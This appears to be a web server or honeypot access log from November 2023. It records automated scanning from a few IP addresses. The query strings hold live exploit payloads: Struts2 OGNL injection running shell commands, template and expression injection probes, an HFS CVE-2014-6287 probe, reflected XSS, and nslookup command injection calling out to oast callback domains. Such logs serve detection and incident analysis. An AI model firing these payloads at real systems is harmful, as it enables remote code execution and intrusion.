| 2023/11/14 | 9:48:22 | 107.172.83.34 | redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 |
| 2023/11/14 | 16:28:52 | 107.172.83.34 | uri={{228*|98|}} | Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 |
| 2023/11/14 | 12:24:16 | 107.172.83.34 | id=F7IZsu%25{128*128} | Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 |
| 2023/11/14 | 16:28:52 | 107.172.83.34 | uri={{228*|98|}} | Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 |
| 2023/11/14 | 16:29:00 | 107.172.83.34 | uri={{228*|98|}} | Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 |
| 2023/11/14 | 16:33:46 | 107.172.83.34 | _tn={{trimprefix(base64_decode(httoken), | Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 |
| 2023/11/14 | 10:16:17 | 107.172.83.34 | response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test | Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 |
| 2023/11/14 | 12:24:13 | 107.172.83.34 | id=F7IZsu%25{128*128} | Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 |
| 2023/11/14 | 20:43:07 | 107.172.83.34 | mode=8700&operation=1&datagrid=179&json={"%f0%9f%a6%9e":"test"} | Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 |
| 2023/11/14 | 23:24:26 | 107.172.83.34 | url=%23{T(java.net.InetAddress).getByName(|cl9hkovpu5aci1q5grr0p36pr85ze9tk1.oast.pro|)}&mgrDn=a&pwd=a | Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 |
| 2023/11/14 | 9:18:17 | 107.172.83.34 | search==%00{.cookie|dF0yiY|value%3dCVE-2014-6287.} | Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 |
| 2023/11/14 | 9:47:32 | 107.172.83.34 | redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 |
| 2023/11/14 | 9:47:39 | 107.172.83.34 | redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 |
| 2023/11/14 | 9:47:54 | 107.172.83.34 | action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 |
| 2023/11/14 | 9:48:00 | 107.172.83.34 | action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F |
| 2023/11/14 | 9:48:15 | 107.172.83.34 | redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 |
| 2023/11/14 | 9:48:22 | 107.172.83.34 | redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 |
| 2023/11/14 | 10:16:17 | 107.172.83.34 | response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test | Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 |
| 2023/11/14 | 20:43:08 | 107.172.83.34 | mode=8700&operation=1&datagrid=179&json={"%f0%9f%a6%9e":"test"} | Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 |
| 2023/11/14 | 23:24:26 | 107.172.83.34 | url=%23{T(java.net.InetAddress).getByName(|cl9hkovpu5aci1q5grr0zuzshxywwbnoh.oast.pro|)}&mgrDn=a&pwd=a | Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 |
| 2023/11/14 | 9:47:30 | 107.172.83.34 | redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 |
| 2023/11/14 | 9:47:38 | 107.172.83.34 | redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 |
| 2023/11/14 | 9:47:47 | 107.172.83.34 | action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 |
| 2023/11/14 | 9:47:54 | 107.172.83.34 | action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 |
| 2023/11/14 | 9:48:08 | 107.172.83.34 | redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 |
| 2023/11/14 | 9:48:12 | 107.172.83.34 | redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 |
| 2023/11/14 | 16:28:59 | 107.172.83.34 | uri={{228*|98|}} | Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 |
| 2023/11/14 | 16:33:46 | 107.172.83.34 | _tn={{trimprefix(base64_decode(httoken), | Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 |
| 2023/11/14 | 12:24:13 | 107.172.83.34 | id=F7IZsu%25{128*128} | Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 |
| 2023/11/14 | 16:28:52 | 107.172.83.34 | uri={{228*|98|}} | Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F |
| 2023/11/14 | 16:29:00 | 107.172.83.34 | uri={{228*|98|}} | Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 |
| 2023/11/14 | 16:33:46 | 107.172.83.34 | _tn={{trimprefix(base64_decode(httoken), | Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 |
| 2023/11/14 | 9:18:18 | 107.172.83.34 | search==%00{.cookie|dF0yiY|value%3dCVE-2014-6287.} | Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 |
| 2023/11/14 | 16:28:52 | 107.172.83.34 | uri={{228*|98|}} | Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 |
| 2023/11/14 | 10:16:18 | 107.172.83.34 | response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test | Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 |
| 2023/11/14 | 12:24:16 | 107.172.83.34 | id=F7IZsu%25{128*128} | Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 |
| 2023/11/14 | 20:43:09 | 107.172.83.34 | mode=8700&operation=1&datagrid=179&json={"%f0%9f%a6%9e":"test"} | Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 |
| 2023/11/14 | 23:24:29 | 107.172.83.34 | url=%23{T(java.net.InetAddress).getByName(|cl9hkovpu5aci1q5grr0prpmij6g4yssc.oast.pro|)}&mgrDn=a&pwd=a | Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 |
| 2023/11/14 | 16:28:56 | 107.172.83.34 | uri={{228*|98|}} | Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 |
| 2023/11/14 | 16:33:43 | 107.172.83.34 | _tn={{trimprefix(base64_decode(httoken), | Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 |
| 2023/11/15 | 2:02:54 | 107.172.83.34 | types=%27;});alert(document.domain);$(picker).on(%27Noodles%27,%20function(result)%20{%20var%20XSS=%27 | Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 |
| 2023/11/15 | 1:26:26 | 107.172.83.34 | clientId={{id}}&timeout=500&wiki=xwiki | Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 |
| 2023/11/15 | 1:26:26 | 107.172.83.34 | clientId={{id}}&timeout=500&wiki=xwiki | Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 |
| 2023/11/15 | 2:02:54 | 107.172.83.34 | types=%27;});alert(document.domain);$(picker).on(%27Noodles%27,%20function(result)%20{%20var%20XSS=%27 | Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 |
| 2023/11/15 | 13:32:14 | 141.98.255.144 | NodeCode=1050050011;nslookup${IFS}cl9m1p0k8dg92nh6qr3gbnctskrmrt16d.oast.site;#${IFS}|;nslookup${IFS}cl9m1p0k8dg92nh6qr3gbnctskrmrt16d.oast.site;#${IFS}";nslookup${IFS}cl9m1p0k8dg92nh6qr3gbnctskrmrt16d.oast.site;#${IFS}&ID=1000000771673841;nslookup${IFS}cl9m1p0k8dg92nh6qr3gbnctskrmrt16d.oast.site;#${IFS}|;nslookup${IFS}cl9m1p0k8dg92nh6qr3gbnctskrmrt16d.oast.site;#${IFS}";nslookup${IFS}cl9m1p0k8dg92nh6qr3gbnctskrmrt16d.oast.site;#${IFS} | Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 |
| 2023/11/15 | 13:32:17 | 141.98.255.144 | NodeCode=1050080021;nslookup${IFS}cl9m1p0k8dg92nh6qr3gfapnoe47yk7p1.oast.site;#${IFS}|;nslookup${IFS}cl9m1p0k8dg92nh6qr3gfapnoe47yk7p1.oast.site;#${IFS}";nslookup${IFS}cl9m1p0k8dg92nh6qr3gfapnoe47yk7p1.oast.site;#${IFS}&ID=1000005622917961;nslookup${IFS}cl9m1p0k8dg92nh6qr3gfapnoe47yk7p1.oast.site;#${IFS}|;nslookup${IFS}cl9m1p0k8dg92nh6qr3gfapnoe47yk7p1.oast.site;#${IFS}";nslookup${IFS}cl9m1p0k8dg92nh6qr3gfapnoe47yk7p1.oast.site;#${IFS} | Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 |
| 2023/11/15 | 13:32:17 | 141.98.255.144 | NodeCode=1050060011;nslookup${IFS}cl9m1p0k8dg92nh6qr3guibi6qfufqdwz.oast.site;#${IFS}|;nslookup${IFS}cl9m1p0k8dg92nh6qr3guibi6qfufqdwz.oast.site;#${IFS}";nslookup${IFS}cl9m1p0k8dg92nh6qr3guibi6qfufqdwz.oast.site;#${IFS}&ID=401;nslookup${IFS}cl9m1p0k8dg92nh6qr3guibi6qfufqdwz.oast.site;#${IFS}|;nslookup${IFS}cl9m1p0k8dg92nh6qr3guibi6qfufqdwz.oast.site;#${IFS}";nslookup${IFS}cl9m1p0k8dg92nh6qr3guibi6qfufqdwz.oast.site;#${IFS} | Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 |
| 2023/11/15 | 1:26:30 | 107.172.83.34 | clientId={{id}}&timeout=500&wiki=xwiki | Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 |
| 2023/11/15 | 2:02:54 | 107.172.83.34 | types=%27;});alert(document.domain);$(picker).on(%27Noodles%27,%20function(result)%20{%20var%20XSS=%27 | Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 |
| 2023/11/15 | 1:26:28 | 107.172.83.34 | clientId={{id}}&timeout=500&wiki=xwiki | Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 |
| 2023/11/15 | 2:02:54 | 107.172.83.34 | types=%27;});alert(document.domain);$(picker).on(%27Noodles%27,%20function(result)%20{%20var%20XSS=%27 | Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 |
| 2023/11/15 | 1:26:26 | 107.172.83.34 | clientId={{id}}&timeout=500&wiki=xwiki | Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 |
| 2023/11/15 | 2:02:55 | 107.172.83.34 | types=%27;});alert(document.domain);$(picker).on(%27Noodles%27,%20function(result)%20{%20var%20XSS=%27 | Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 |
| 2023/11/15 | 1:26:28 | 107.172.83.34 | clientId={{id}}&timeout=500&wiki=xwiki | Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 |
| 2023/11/15 | 2:02:54 | 107.172.83.34 | types=%27;});alert(document.domain);$(picker).on(%27Noodles%27,%20function(result)%20{%20var%20XSS=%27 | Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 |
| 2023/11/17 | 6:17:04 | 221.150.78.185 | search==%00{.cookie|8iyAyJ|value%3dCVE-2014-6287.} | Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 |
| 2023/11/17 | 6:17:04 | 221.150.78.185 | redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 |
| 2023/11/17 | 6:17:04 | 221.150.78.185 | redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 |
| 2023/11/17 | 6:17:04 | 221.150.78.185 | response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test | Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 |
| 2023/11/17 | 6:17:04 | 221.150.78.185 | action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 |
| 2023/11/17 | 6:17:04 | 221.150.78.185 | action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 |
| 2023/11/17 | 6:17:04 | 221.150.78.185 | redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 |
| 2023/11/17 | 6:17:04 | 221.150.78.185 | id=c2dIKm%25{128*128} | Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 |
| 2023/11/17 | 6:17:04 | 221.150.78.185 | redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 |
| 2023/11/17 | 6:17:06 | 221.150.78.185 | mode=8700&operation=1&datagrid=179&json={"%f0%9f%a6%9e":"test"} | Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 |
| 2023/11/17 | 6:17:07 | 221.150.78.185 | clientId={{id}}&timeout=500&wiki=xwiki | Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 |
| 2023/11/28 | 5:57:49 | 221.150.72.75 | redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 |
| 2023/11/28 | 5:57:49 | 221.150.72.75 | redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 |
| 2023/11/28 | 5:57:49 | 221.150.72.75 | response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test | Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 |
